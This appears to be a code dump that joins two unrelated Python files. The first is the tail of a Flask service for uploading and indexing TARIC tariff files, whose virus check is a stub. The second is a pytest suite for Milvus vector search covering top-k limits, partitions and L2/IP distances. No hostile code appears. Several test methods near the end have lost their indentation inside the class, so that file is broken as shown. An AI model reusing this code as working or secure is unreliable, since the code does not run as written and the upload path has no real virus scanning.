    threading.Thread(target=rebuild_index, args=[True]).start()
    return Response("200 OK File deleted, reindexing", status=200)
# --------------------------------------------------------------------
# API to upload new taric file
# File in the API is identified by seq regardless of it's source name
# File modification time can be set using ?modtime=yyyy-mm-ddThh:mm:ss
# --------------------------------------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["POST"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["POST"])
def taricfiles_upload(seq):
    """Upload a new taric delta file.

    The file is stored under *seq* regardless of its source filename.  An
    optional ?modtime=yyyy-mm-ddThh:mm:ss query parameter sets the stored
    modification time.  The upload is virus-checked (currently a stub) and
    schema-validated before being renamed into place and indexed.
    """
    if not is_auth_upload(request):
        logger.debug("API key not provided or not authorised")
        return Response("403 Unauthorised", status=403)
    if not is_valid_seq(seq):
        logger.debug("seq is invalid")
        return Response("400 Bad request [invalid seq]", status=400)
    if "file" not in request.files:
        logger.debug("No file uploaded")
        return Response("400 No file uploaded", status=400)
    # file is the part attached in the POST request
    file = request.files["file"]
    if not file or file.filename == "":
        logger.debug("No file uploaded")
        return Response("400 No file uploaded", status=400)
    logger.debug("file uploaded is %s", file.filename)
    # Read the optional modification time once instead of re-querying args,
    # and use the idiomatic "is not None" comparison.
    modtime = request.args.get("modtime")
    if modtime is not None and not is_valid_datetime(modtime):
        logger.debug("Invalid file modification timestamp specified %s", modtime)
        return Response("400 Invalid file modification timestamp specified", status=400)
    logger.debug("file mod time is %s", modtime)
    # Save the uploaded XML file as temporary
    temp_file_name = save_temp_taric_file(file, seq)
    # TODO - should virus check ..
    # NOTE(review): file.read() here may return b"" if save_temp_taric_file
    # already consumed the upload stream — confirm once a real scanner exists.
    if not is_virus_checked(file.read()):
        logger.debug("File failed virus check")
        remove_temp_taric_file(seq)
        return Response("400 Failed virus check", status=400)
    # Validate XML against XSD
    if not is_schema_validated(temp_file_name):
        logger.debug("File failed schema check")
        remove_temp_taric_file(seq)
        return Response("400 Failed schema check", status=400)
    # Rename the temporary XML file and update the index - used by the deltas API
    try:
        rename_taric_file(seq, modtime)
        update_index(seq)
    except IOError as exc:
        logger.error("Error saving file %s.xml: %s", seq, str(exc))
        return Response("500 Error saving file", status=500)
    return Response("200 OK File uploaded", status=200)
def get_server():
    """Build the WSGI server: Sentry, response headers/GA hook, Elastic APM.

    Returns a gevent WSGIServer bound to 0.0.0.0:PORT serving the Flask app.
    """
    if SENTRY_DSN:
        sentry_sdk.init(
            dsn=SENTRY_DSN, integrations=[FlaskIntegration()],
        )

    @app.after_request
    def add_x_robots(response):  # pylint: disable=W0612
        # Discourage search-engine indexing and enforce HSTS on every response.
        response.headers["X-Robots-Tag"] = "noindex, nofollow"
        response.headers[
            "Strict-Transport-Security"
        ] = "max-age=31536000; includeSubDomains"
        if GA_TRACKING_ID:
            # Fire-and-forget analytics hit; gevent.spawn keeps the HTTP call
            # off the request/response critical path.
            gevent.spawn(
                _send_to_google_analytics,
                request.remote_addr,
                request.host_url,
                request.path,
                request.headers,
            )
        return response

    elastic_apm_url = ELASTIC_APM_URL
    elastic_apm_secret_token = ELASTIC_APM_TOKEN
    # APM is configured only when both the URL and the token are present.
    elastic_apm = (
        {
            "SERVICE_NAME": "public-tariffs-api",
            "SECRET_TOKEN": elastic_apm_secret_token,
            "SERVER_URL": elastic_apm_url,
            "ENVIRONMENT": ENVIRONMENT,
        }
        if elastic_apm_url and elastic_apm_secret_token
        else {}
    )
    if elastic_apm:
        app.config["ELASTIC_APM"] = elastic_apm
        ElasticAPM(app)
    server = WSGIServer(("0.0.0.0", PORT), app, log=app.logger)
    return server
@click.command()
def serve():
    """Run webserver.

    Rebuilds the index if missing, then serves until SIGTERM stops the
    gevent WSGI server.
    """
    rebuild_index(False)
    server = get_server()
    # The previous code registered the identical SIGTERM handler twice (its
    # own TODO questioned this); a single registration stops the server.
    gevent.signal_handler(signal.SIGTERM, server.stop)
    server.serve_forever()
    gevent.get_hub().join()
@click.command()
def ls():
    """List delta, temporary and other files.
    """
    # Bug fix: get_file_list requires a prefix argument and returns S3-style
    # dict entries keyed by "Key" (see rebuild_index); the old code called it
    # with no argument and treated entries as plain filenames.
    for entry in get_file_list(None):
        f = entry["Key"]
        f = f[f.rindex("/") + 1:]  # remove folder prefix
        # File identification logic taken from rebuild_index
        if f.startswith("TEMP_"):
            seq = f[5:-4]  # remove TEMP_ file prefix and .xml extension
            click.echo("TEMP {seq} (unknown)".format(seq=seq))
        elif is_valid_seq(f[:-4]):  # ignore non taric files
            seq = f[:-4]
            click.echo("DELTA {seq} (unknown)".format(seq=seq))
        else:
            click.echo("MISC (unknown)")
@click.command()
def index():
    """Rebuild file index."""
    # NOTE(review): nocheck=False means this only rebuilds when the index
    # file is absent — confirm the command is meant to be conditional.
    rebuild_index(False)
@click.command(help="Delta sequence number [6 digits].")
@click.argument("seq")
def rmdelta(seq):
    """Remove delta file for sequence, then rebuild the index if missing."""
    if not is_valid_seq(seq):
        # Fixed garbled user-facing message ("digita should be 6 digit numbers").
        click.echo("{seq} should be a 6 digit number.".format(seq=seq))
        return
    remove_taric_file(seq)
    rebuild_index(False)
@click.group(no_args_is_help=False, invoke_without_command=True)
def cli():
    """Top-level CLI group; with no arguments the webserver runs."""
    if not sys.argv[1:]:
        # For backwards compatibility, default is to run the webserver.
        serve()
if __name__ == "__main__":
    # Setup maintenance commands before dispatching to the click group.
    cli.add_command(rmdelta)
    cli.add_command(ls)
    cli.add_command(serve)
    cli.add_command(index)
    cli()
|
test_search.py | import time
import pdb
import copy
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from pymilvus import DataType
from utils import *
from constants import *
uid = "test_search"
nq = 1  # default number of query vectors per search
epsilon = 0.001  # distance tolerance when a vector should match itself
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
# Shared test data: a single entity, a default-size batch, and a binary batch,
# plus default query payloads built from them.
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, default_top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, default_top_k,
                                                                    nq)
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
    '''
    Insert nb generated entities into the collection and flush.
    Reuses the module-level batch when nb == 3000; returns (entities, ids).
    (auto_id is accepted for signature compatibility but not used here.)
    '''
    global entities
    insert_entities = entities if nb == 3000 else gen_entities(nb, is_normal=True)
    if partition_names is None:
        ids = connect.insert(collection, insert_entities)
    else:
        ids = connect.insert(collection, insert_entities, partition_name=partition_names)
    connect.flush([collection])
    return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
    '''
    Generate binary entities and (when insert is True) add them to the
    collection and flush.  Returns (raw_vectors, entities, ids); ids is
    empty when nothing was inserted.
    '''
    global binary_entities
    global raw_vectors
    ids = []
    if nb == 3000:
        insert_raw_vectors, insert_entities = raw_vectors, binary_entities
    else:
        insert_raw_vectors, insert_entities = gen_binary_entities(nb)
    if insert is True:
        if partition_names is None:
            ids = connect.insert(collection, insert_entities)
        else:
            ids = connect.insert(collection, insert_entities, partition_name=partition_names)
        connect.flush([collection])
    return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
    """
    Search API tests: parametrized index/top-k/nq fixtures and search cases.
    """
    @pytest.fixture(
        scope="function",
        params=gen_index()
    )
    def get_index(self, request, connect):
        # Yields every index configuration produced by gen_index().
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # Deep copy so a test mutating the params (e.g. metric_type) cannot
        # leak changes into other parametrized runs.
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return copy.deepcopy(request.param)
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_jaccard_index(self, request, connect):
        # Returns only binary-supported index params; otherwise yields None
        # (the skip below is commented out).
        logging.getLogger().info(request.param)
        if request.param["index_type"] in binary_support():
            return request.param
        # else:
        #     pytest.skip("Skip index Temporary")
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_hamming_index(self, request, connect):
        # Same filtering as get_jaccard_index: only binary-supported indexes.
        logging.getLogger().info(request.param)
        if request.param["index_type"] in binary_support():
            return request.param
        # else:
        #     pytest.skip("Skip index Temporary")
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_structure_index(self, request, connect):
        # Only the FLAT index is passed through; other params yield None.
        logging.getLogger().info(request.param)
        if request.param["index_type"] == "FLAT":
            return request.param
        # else:
        #     pytest.skip("Skip index Temporary")
    """
    generate top-k params
    """
    @pytest.fixture(
        scope="function",
        params=[1, 10]
    )
    def get_top_k(self, request):
        # Parametrized top_k values: minimal (1) and a typical size (10).
        yield request.param
    @pytest.fixture(
        scope="function",
        params=[1, 10, 1100]
    )
    def get_nq(self, request):
        # Parametrized query-batch sizes, including a large batch (1100).
        yield request.param
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_flat(self, connect, collection, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
        if top_k <= max_top_k:
            connect.load_collection(collection)
            res = connect.search(collection, query)
            # Query vectors come from the inserted data, so the best hit must
            # be a (near-)exact self-match within epsilon.
            assert len(res[0]) == top_k
            assert res[0]._distances[0] <= epsilon
            assert check_id_result(res[0], ids[0])
        else:
            # Oversized top_k must be rejected by the server.
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_flat_top_k(self, connect, collection, get_nq):
        '''
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        # 16385 is presumably one past the server's top_k limit, so the else
        # branch (expected failure) is the path exercised here — TODO confirm
        # against max_top_k in constants.
        top_k = 16385
        nq = get_nq
        entities, ids = init_data(connect, collection)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
        if top_k <= max_top_k:
            connect.load_collection(collection)
            res = connect.search(collection, query)
            assert len(res[0]) == top_k
            assert res[0]._distances[0] <= epsilon
            assert check_id_result(res[0], ids[0])
        else:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
    @pytest.mark.skip("r0.3-test")
    def _test_search_field(self, connect, collection, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        # Disabled twice over: leading underscore keeps pytest from collecting
        # it, and the skip mark documents why (r0.3 feature).
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
        if top_k <= max_top_k:
            connect.load_collection(collection)
            res = connect.search(collection, query, fields=["float_vector"])
            assert len(res[0]) == top_k
            assert res[0]._distances[0] <= epsilon
            assert check_id_result(res[0], ids[0])
            # Second search returns the scalar "float" field with each hit.
            res = connect.search(collection, query, fields=["float"])
            for i in range(nq):
                assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
        else:
            with pytest.raises(Exception):
                connect.search(collection, query)
    def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
        '''
        target: test basic search function before and after deletion, all the search params is
        correct, change top-k value.
        check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
        method: search with the given vectors, check the result
        expected: the deleted entities do not exist in the result.
        '''
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection, nb=10000)
        first_int64_value = entities[0]["values"][0]
        first_vector = entities[2]["values"][0]
        search_param = get_search_param("FLAT")
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
        # Replace the query vectors in place with just the first entity's
        # vector, so the top hit must be that entity.
        vecs[:] = []
        vecs.append(first_vector)
        res = None
        if top_k > max_top_k:
            with pytest.raises(Exception):
                connect.search(collection, query, fields=['int64'])
            # pytest.skip("top_k value is larger than max_topp_k")
            pass
        else:
            res = connect.search(collection, query, fields=['int64'])
            assert len(res) == 1
            assert len(res[0]) >= top_k
            assert res[0][0].id == ids[0]
            assert res[0][0].entity.get("int64") == first_int64_value
            assert res[0]._distances[0] < epsilon
            assert check_id_result(res[0], ids[0])
            # Delete the matched entity, flush, and search again: the old top
            # hit must be gone and the former runner-up promoted.
            connect.delete_entity_by_id(collection, ids[:1])
            connect.flush([collection])
            res2 = connect.search(collection, query, fields=['int64'])
            assert len(res2) == 1
            assert len(res2[0]) >= top_k
            assert res2[0][0].id != ids[0]
            if top_k > 1:
                assert res2[0][0].id == res[0][1].id
                assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = get_nq
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
        else:
            connect.load_collection(collection)
            res = connect.search(collection, query)
            # Self-match: the closest hit to each query vector is itself.
            assert len(res) == nq
            assert len(res[0]) >= top_k
            assert res[0]._distances[0] < epsilon
            assert check_id_result(res[0], ids[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
        '''
        target: test search with different metric_type
        method: build index with L2, and search using IP
        expected: search ok
        '''
        search_metric_type = "IP"
        index_type = get_simple_index["index_type"]
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, metric_type=search_metric_type,
                                        search_params=search_param)
        connect.load_collection(collection)
        if index_type == "FLAT":
            # FLAT tolerates a metric mismatch; IP distances are descending.
            res = connect.search(collection, query)
            assert len(res) == nq
            assert len(res[0]) == default_top_k
            assert res[0]._distances[0] > res[0]._distances[default_top_k - 1]
        else:
            # Other index types reject searching with a different metric.
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k, search collection with partition tag return empty
        '''
        top_k = get_top_k
        nq = get_nq
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        # Partition is created but data is inserted into the default partition,
        # so a partition-scoped search must come back empty.
        connect.create_partition(collection, default_tag)
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
        else:
            connect.load_collection(collection)
            res = connect.search(collection, query)
            assert len(res) == nq
            assert len(res[0]) >= top_k
            assert res[0]._distances[0] < epsilon
            assert check_id_result(res[0], ids[0])
            connect.release_collection(collection)
            connect.load_partitions(collection, [default_tag])
            res = connect.search(collection, query, partition_names=[default_tag])
            assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(600)
    def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = get_nq
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        # Data is inserted directly into the named partition, so a search
        # scoped to that partition must find the self-matches.
        connect.create_partition(collection, default_tag)
        entities, ids = init_data(connect, collection, partition_names=default_tag)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query, partition_names=[default_tag])
        else:
            connect.load_partitions(collection, [default_tag])
            res = connect.search(collection, query, partition_names=[default_tag])
            assert len(res) == nq
            assert len(res[0]) == top_k
            assert res[0]._distances[0] < epsilon
            assert check_id_result(res[0], ids[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_index_partition_not_existed(self, connect, collection, get_top_k, get_nq, get_simple_index):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search with the given vectors and tag (tag name not existed in collection), check the result
        expected: error raised
        '''
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query, partition_names=["new_tag"])
        else:
            connect.load_collection(collection)
            # Searching a partition that was never created must raise.
            with pytest.raises(Exception) as e:
                connect.search(collection, query, partition_names=["new_tag"])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search collection with the given vectors and tags, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = 2
        new_tag = "new_tag"
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        # Two partitions with disjoint data; queries are built from the first
        # partition's entities only.
        connect.create_partition(collection, default_tag)
        connect.create_partition(collection, new_tag)
        entities, ids = init_data(connect, collection, partition_names=default_tag)
        new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
        else:
            connect.load_collection(collection)
            res = connect.search(collection, query)
            assert check_id_result(res[0], ids[0])
            assert not check_id_result(res[1], new_ids[0])
            assert res[0]._distances[0] < epsilon
            assert res[1]._distances[0] < epsilon
            # Scoped to the other partition there can be no exact self-match.
            res = connect.search(collection, query, partition_names=[new_tag])
            assert res[0]._distances[0] > epsilon
            assert res[1]._distances[0] > epsilon
            connect.release_collection(collection)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search collection with the given vectors and tags, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = 2
        tag = "tag"
        new_tag = "new_tag"
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        connect.create_partition(collection, tag)
        connect.create_partition(collection, new_tag)
        entities, ids = init_data(connect, collection, partition_names=tag)
        new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        print(f'entities[-1]["values"][:1]: {entities[-1]["values"][:1]}')
        print(f'new_entities[-1]["values"][:1]: {new_entities[-1]["values"][:1]}')
        # One query vector per partition: the first from "tag", the second
        # from "new_tag".
        query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param,
                                        replace_vecs=[entities[-1]["values"][:1][0], new_entities[-1]["values"][:1][0]])
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
        else:
            connect.load_collection(collection)
            # Partition names are matched as regex patterns: "(.*)tag" covers
            # both partitions, "new(.*)" only the second.
            res = connect.search(collection, query, partition_names=["(.*)tag"])
            assert check_id_result(res[0], ids[0])
            assert check_id_result(res[0], new_ids[0])
            assert res[0]._distances[0] < epsilon
            assert res[1]._distances[0] < epsilon
            res = connect.search(collection, query, partition_names=["new(.*)"])
            assert not check_id_result(res[0], ids[0])
            assert check_id_result(res[1], new_ids[0])
            assert res[0]._distances[0] > epsilon
            assert res[1]._distances[0] < epsilon
            connect.release_collection(collection)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
        connect.load_collection(collection)
        res = connect.search(collection, query)
        # For IP with normalized vectors a self-match scores ~1.0; allow for
        # the generator's inaccuracy bound.
        assert len(res[0]) == top_k
        assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
        assert check_id_result(res[0], ids[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
        '''
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = get_nq
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        entities, ids = init_data(connect, collection)
        # Build the index with the IP metric so the search metric matches.
        get_simple_index["metric_type"] = "IP"
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) >= top_k
        assert check_id_result(res[0], ids[0])
        assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
        '''
        target: test IP search against an empty partition after building an index
        method: add vectors into collection (default partition only), search with the given
                vectors, then search restricted to the still-empty partition
        expected: the length of the result is top_k; searching the empty partition returns no hits
        '''
        top_k = get_top_k
        nq = get_nq
        metric_type = "IP"
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        connect.create_partition(collection, default_tag)
        # entities go to the default partition; default_tag stays empty
        entities, ids = init_data(connect, collection)
        get_simple_index["metric_type"] = metric_type
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
                                        search_params=search_param)
        if top_k > max_top_k:
            # server rejects top_k above its hard limit
            with pytest.raises(Exception) as e:
                res = connect.search(collection, query)
        else:
            connect.load_collection(collection)
            res = connect.search(collection, query)
            assert len(res) == nq
            assert len(res[0]) >= top_k
            assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
            assert check_id_result(res[0], ids[0])
            res = connect.search(collection, query, partition_names=[default_tag])
            assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
        '''
        target: test IP search with a partition filter after building an index
        method: insert into two partitions, search the whole collection and then only
                the second partition; check which ids can appear in the results
        expected: the length of the result is top_k
        '''
        top_k = get_top_k
        nq = 2
        metric_type = "IP"
        new_tag = "new_tag"
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        connect.create_partition(collection, default_tag)
        connect.create_partition(collection, new_tag)
        entities, ids = init_data(connect, collection, partition_names=default_tag)
        new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
        get_simple_index["metric_type"] = metric_type
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        # queries come from `entities`, i.e. from the default_tag partition
        query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert check_id_result(res[0], ids[0])
        assert not check_id_result(res[1], new_ids[0])
        assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
        assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
        # restricted to new_tag, the exact-match entity is absent so the
        # best distance falls below the exact-match threshold
        res = connect.search(collection, query, partition_names=["new_tag"])
        assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
        # TODO:
        # assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
'''
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_distance_l2(self, connect, collection):
        '''
        target: search collection, and check the result: distance
        method: compare the returned distance value with the value computed with Euclidean distance
        expected: the returned distance equals the computed value
        '''
        nq = 2
        search_param = {"nprobe": 1}
        # only nq entities inserted, so the expected nearest neighbour is computable by hand
        entities, ids = init_data(connect, collection, nb=nq)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
                                        search_params=search_param)
        inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
                                                      search_params=search_param)
        distance_0 = l2(vecs[0], inside_vecs[0])
        distance_1 = l2(vecs[0], inside_vecs[1])
        connect.load_collection(collection)
        res = connect.search(collection, query)
        # server returns squared L2 -- sqrt before comparing with l2() helper
        assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
        '''
        target: search collection after index build, and check the result: distance
        method: compute the minimum L2 distance by brute force and check the id of the top hit
        expected: the returned top id matches the brute-force nearest neighbour
        '''
        index_type = get_simple_index["index_type"]
        nq = 2
        entities, ids = init_data(connect, id_collection, auto_id=False)
        connect.create_index(id_collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
                                        search_params=search_param)
        inside_vecs = entities[-1]["values"]
        # brute-force scan for the true nearest neighbour of the first query vector
        # NOTE(review): min_distance starts at 1.0, which presumes all pairwise L2
        # distances are < 1 (normalized vectors) -- TODO confirm
        min_distance = 1.0
        min_id = None
        for i in range(default_nb):
            tmp_dis = l2(vecs[0], inside_vecs[i])
            if min_distance > tmp_dis:
                min_distance = tmp_dis
                min_id = ids[i]
        connect.load_collection(id_collection)
        res = connect.search(id_collection, query)
        tmp_epsilon = epsilon
        # NOTE(review): return value of check_id_result is discarded -- presumably
        # this was meant to be asserted
        check_id_result(res[0], min_id)
        # if index_type in ["ANNOY", "IVF_PQ"]:
        #     tmp_epsilon = 0.1
        # TODO:
        # assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
